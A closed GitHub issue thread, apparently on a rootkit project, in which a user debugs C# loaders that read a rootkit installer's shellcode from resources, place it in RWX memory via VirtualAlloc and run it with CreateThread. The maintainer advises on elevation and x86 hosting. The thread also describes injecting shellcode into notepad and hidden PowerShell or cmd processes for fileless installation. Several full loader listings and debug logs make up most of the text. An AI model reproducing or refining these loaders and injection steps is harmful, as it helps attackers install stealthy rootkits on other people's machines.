Closed fSociety-Protected closed 3 months ago
When I compile like that:
using System;
using System.Runtime.InteropServices;
public static class Program
{
public static void Main()
{
// 1. Load Install.shellcode from resources
byte[] shellCode;
// Load the shellcode from resources by its name "C9_ShellCode"
shellCode = ShellCode.Properties.Resources.Install_shellcode; // Assuming the shellcode is stored as a resource in the project
// 2. Create an RWX buffer with the shellcode
IntPtr buffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, 0x1000, 0x40);
Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
// 3. Start the shellcode in a thread and wait until it terminates
IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
WaitForSingleObject(thread, 0xffffffff);
// Free the allocated memory after executing the shellcode
VirtualFree(buffer, UIntPtr.Zero, 0x8000);
}
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);
}
Then WORKS!
But when I try to create a function and call it when I press a button, dont work. IDK.... ๐ญ๐ญ
private const int PROCESS_ALL_ACCESS = 0x1F0FFF;
private const uint MEM_COMMIT = 0x00001000;
private const uint MEM_RESERVE = 0x00002000;
private const uint PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);
public void C9__INIT__INSTALL__STAGE()
{
// 1. Load Install.shellcode from resources
byte[] shellCode;
// Load the shellcode from resources by its name "C9_ShellCode"
shellCode = C9_LOADER.Properties.Resources.Install_shellcode; // Assuming the shellcode is stored as a resource in the project
// 2. Create an RWX buffer with the shellcode
IntPtr buffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, 0x1000, 0x40);
Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
// 3. Start the shellcode in a thread and wait until it terminates
IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
WaitForSingleObject(thread, 0xffffffff);
// Free the allocated memory after executing the shellcode
VirtualFree(buffer, UIntPtr.Zero, 0x8000);
}
public void INSTALL_Click(object sender, RoutedEventArgs e)
{
C9__INIT__INSTALL__STAGE();
}
Just don't use chatgpt to write code
Just don't use chatgpt to write code
โ [ UPDATE LOG ]
Now I'm even more confused, because this Install.shellcode sometimes it works and sometimes it doesn't.... used to seem to work and run as Install.exe should but now it doesn't anymore.... ๐คทโโ๏ธ๐คทโโ๏ธ๐คทโโ๏ธ๐คฏ๐คฏ๐คฏ
Just a few quick questions... Why do you create a new dummy process to run the shellcode? It's enough to create a thread and run it there. And secondly, does your process run with elevated privileges? If it doesn't, then installation will fail. One more thing to keep in mind is that the hosting process must be 32-bit. If you just run Powershell.exe, then that process will certainly be the 64-bit executable.
I suggest that you run the shellcode within the current process, make sure it's elevated and x86. Can you try that? If this doesn't work, could you please debug into this VirtualAlloc
... CreateThread
and tell me which one of this API calls fail? i.e. which one returns an error result. Please remember to run Visual Studio with elevated privileges as well when debugging the shellcode installation.
Just a few quick questions... Why do you create a new dummy process to run the shellcode? It's enough to create a thread and run it there. And secondly, does your process run with elevated privileges? If it doesn't, then installation will fail. One more thing to keep in mind is that the hosting process must be 32-bit. If you just run Powershell.exe, then that process will certainly be the 64-bit executable.
I suggest that you run the shellcode within the current process, make sure it's elevated and x86. Can you try that? If this doesn't work, could you please debug into this
VirtualAlloc
...CreateThread
and tell me which one of this API calls fail? i.e. which one returns an error result. Please remember to run Visual Studio with elevated privileges as well when debugging the shellcode installation.
Yeah, I have already patched my OS to RUN everything with the highest Admin permissions, so it shouldn't be a permissions issue.โ โ
In terms of architecture, there shouldn't be any problem either. Considering, that both my project and all the "mini-test projects" are set to run on x86, there shouldn't be any incompatibility problem with the ShellCode execution.
โ
Well, I was testing (at least when it worked ๐คทโโ๏ธ), before I started using as template the example you use to load directly the Install.shellcode from resources, I used directly the ShellCode loaded in the code of my program... I was testing and testing... but I always crashed the thread I created to store the shellcode. Then I was doing injection tests to different processes, and I realized that some of them worked and with others not. For example, if I used the calc.exe process (I'm talking about the classic version of win32calc.exe) for some reason the shellcode was not injected, but when I did it with for example the notepad.exe process then it worked.
But well, as I started using your shellcode loader model, I left that research path. ๐ But now, is that the problem I have, before, your code without receiving any modification or anything, it worked perfectly for me, but now I don't know why, it doesn't work for me, and suddenly, there are times when it does. IDK....
I don't know, it's very strange... I'm doing my main project in WPF of C#, I don't know if I should use another design guideline different from the one you show as an example of C#. โ
ShellCode.exe (process 69360) was closed with code 0.
To automatically close the console when debugging stops, enable Tools ->Options ->Debugging ->Close console automatically when debugging stops.
Press any key to close this window. . .
โ
'ShellCode.exe' (CoreCLR: DefaultDomain): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Private.CoreLib.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Usersers\Rootkit.SYSourceSourceRepositoryShellCodeShellCodeCodeBinix.0ShellCode.dll' loaded. The module was compiled without symbols.
ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'c:\program files\microsoft visual studio\2022\community\common7\idecommonextensions\microsoft\hotreload\Microsoft.Extensions.DotNetDeltaApplier.dll' loaded. Symbol loading was skipped. The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.IO.Pipes.dll' loaded. Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Linq.dll' loaded.Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Collections.dll' loaded.Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Console.dll' loaded.
ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Threading.dll' loaded.Symbol loading was skipped.The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.InteropServices.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Threading.Overlapped.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.AccessControl.dll' loaded.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.Principal.Windows.dll' loaded.Symbol loading was skipped.The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.Claims.dll' loaded.Symbol loading was skipped.The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.Loader.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Collections.Concurrent.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
The program '[69360] ShellCode.exe' terminated with code 0 (0x0).
The truth is, due to my inexperience with WinApi functions, I'm probably not seeing the obvious, but at least, from here, everything seems to be running fine, or at least that's the feeling I have, that all WinApi functions are running correctly, but once the Install.Shellcode program is finished it has not been executed. I have checked that it is well implemented as a resource, but well, if it wasn't, I guess I would have noticed it. ๐
โ
โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ โฎ
using System;
using System.Runtime.InteropServices;
public static class Program
{
public static void Main()
{
try
{
// --- Elevated privileges required ---
Console.WriteLine(" ");
// 1. Load Install.shellcode from resources or from a byte[]
byte[] shellCode = ShellCode.Properties.Resources.Install_shellcode;
Console.WriteLine(" #> Install.shellcode loaded successfully from Resources! โ OK");
// 2. Create an RWX buffer with the shellcode.
IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
if (buffer == IntPtr.Zero)
{
Console.WriteLine(" #> Failed to allocate memory for shellcode buffer. โ FAIL");
return;
}
Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
Console.WriteLine(" #> Shellcode copied to allocated buffer sucessfully! โ OK");
// 3. Start the shellcode in a thread and wait until it terminates.
IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
if (thread == IntPtr.Zero)
{
Console.WriteLine(" #> Failed to create a new thread for shellcode execution. โ FAIL");
return;
}
Console.WriteLine(" #> Shellcode execution started sucessfully! โ OK");
// Wait for the thread to finish
WaitForSingleObject(thread, 0xffffffff);
Console.WriteLine(" #> Shellcode execution completed! โ OK");
}
catch (Exception ex)
{
Console.WriteLine($" #> An unexpected error occurred: {ex.Message}");
}
}
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
[DllImport("kernel32.dll")]
private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
}
If this doesn't work, could you please debug into this VirtualAlloc ... CreateThread and tell me which one of this API calls fail? i.e. which one returns an error result. โ
Post Sentence :
In the last tests I did, without creating any dummy process or anything, but creating a new thread for the ShellCode, I put several checks to check the exact point where it failed and everything is OK! until the CreateThread(), there the thread is created but the second it crashes and therefore the main Thread too. ๐ญ๐ญ๐ฅ๐ฅ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
Okayโ โ I โ am โ gonna โ turn โ *** โ crazy...โ โ Rlly!!โ ๐คทโโ๏ธโ ๐คทโโ๏ธโ ๐คฏโ ๐คฏ
Now without touching nothing, now stop working!! Idk, what happening @bytecode77 ๐ฅด๐ฅด๐คฆโโ๏ธ๐คฆโโ๏ธ๐ญ๐ญ
The test project, in which ONLY your template is written, works 100% now!!
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
I don't know, but the feeling I get, is as if the memory space or the RWX Buffer, is not available always/at every startup in my program thread. ๐ค
Its just a theory, ofc...
And that is why sometimes it works and sometimes it does not. ๐คทโโ๏ธ
Or... am I missing something in all this to get this code to work in my C# WPF project. ๐ โ โ
Because the ShellCode works fine, but without doing nothing on the code, โ โโ โ just close the program & start again, now dont works... ๐ฅ ๐ฅ ๐คทโโ๏ธ ๐คทโโ๏ธ โ
public void INSTALL_Click(object sender, RoutedEventArgs e)
{
C9__INIT__INSTALL__STAGE();
}
public static void C9__INIT__INSTALL__STAGE()
{
// --- Elevated privileges required ---
Debug.WriteLine(" ");
// 1. Load Install.shellcode from resources or from a byte[]
byte[] shellCode = C9_LOADER.Properties.Resources.Install_shellcode;
Debug.WriteLine(" #> Install.shellcode loaded successfully from Resources! โ OK");
// 2. Create an RWX buffer with the shellcode.
IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
if (buffer == IntPtr.Zero)
{
Debug.WriteLine(" #> Failed to allocate memory for shellcode buffer. โ FAIL");
}
Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
Debug.WriteLine(" #> Shellcode copied to allocated buffer sucessfully! โ OK");
// 3. Start the shellcode in a thread and wait until it terminates.
IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
if (thread == IntPtr.Zero)
{
Debug.WriteLine(" #> Failed to create a new thread for shellcode execution. โ FAIL");
}
Debug.WriteLine(" #> Shellcode execution started sucessfully! โ OK");
// Wait for the thread to finish
WaitForSingleObject(thread, 0xffffffff);
Debug.WriteLine(" #> Shellcode execution completed! โ OK");
}
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
[DllImport("kernel32.dll")]
private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
- Nothing, I try it a lot of times, diferent methods, diferents things, but the Shellcode sometimes work, sometimes not...
https://github.com/bytecode77/r77-rootkit/assets/72263269/46afe89e-6618-426d-abe6-f82df22be4ec
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โ
Apparently, the problem was inside my main program, which had some functions running on x64 architecture. (As it was not well defined the part of the process which would not be affected by anything related to the above mentioned x64 architecture and I don't know how to do it correctly, the truth...) the shellcode did NOT work in many occasions, it ONLY worked in the occasions in which the memory area which was reserved to host the shellcode, was exclusively x86. ๐ฅด
โ โ So, I went back to my old development path, creating a CMD.EXE console with special attributes to be invisible and inside that CMD.EXE console created, then I could generate an exclusive process, entirely with x86 architecture to be able to inject the shellcode without ANY problem 100% of the time. โ
โ โ
So if there is nothing more to add, when you read all this @bytecode77, you can close this Github thread. ๐ฉ ๐ ๐
The truth is that it has been a hard path in which I have learned a lot about the memory management and processes in general, โ โ about how shellcodes work and how inject them into the different Windows processes. ๐งก ๐ฅ ๐ โ
โ โ
Okay, I see that you've been analyzing the issue and fixed it. That's pretty much what takes up 90 % of my development time for this project.
Glad to hear everything works.
I still developing my project, but I need some help @bytecode77! ๐๐
I need use the Install.ShellCode to run it directly into memory, without drop/write any executeable. But I cant handle works flewless.... ๐ญ๐ญ
Today I spend all the day to create this process... ๐ฅด๐ฅด
Scenario: On my main program, I have 2 Buttons(Only one "works"), one for INSTALL & the other for UNNISTAILL. The plan was that, create a powershell process that appear hidden, only for 3 seconds, and then inject the ShellCode into that process. ๐ง๐ง
Works nice, but I reboot my machine & now STOP working... ๐คทโโ๏ธ๐คทโโ๏ธ๐คทโโ๏ธ I think Its more easy & It be less complicated, but I need a bit of help. ๐ ๐
Thats the function actually Im using it:
_And then on the Click_EventBtn I have that:
### PS = The Actual ShellCode Writted In This Code, Its Just A Dummy ShellCode! โ ( calc.exe )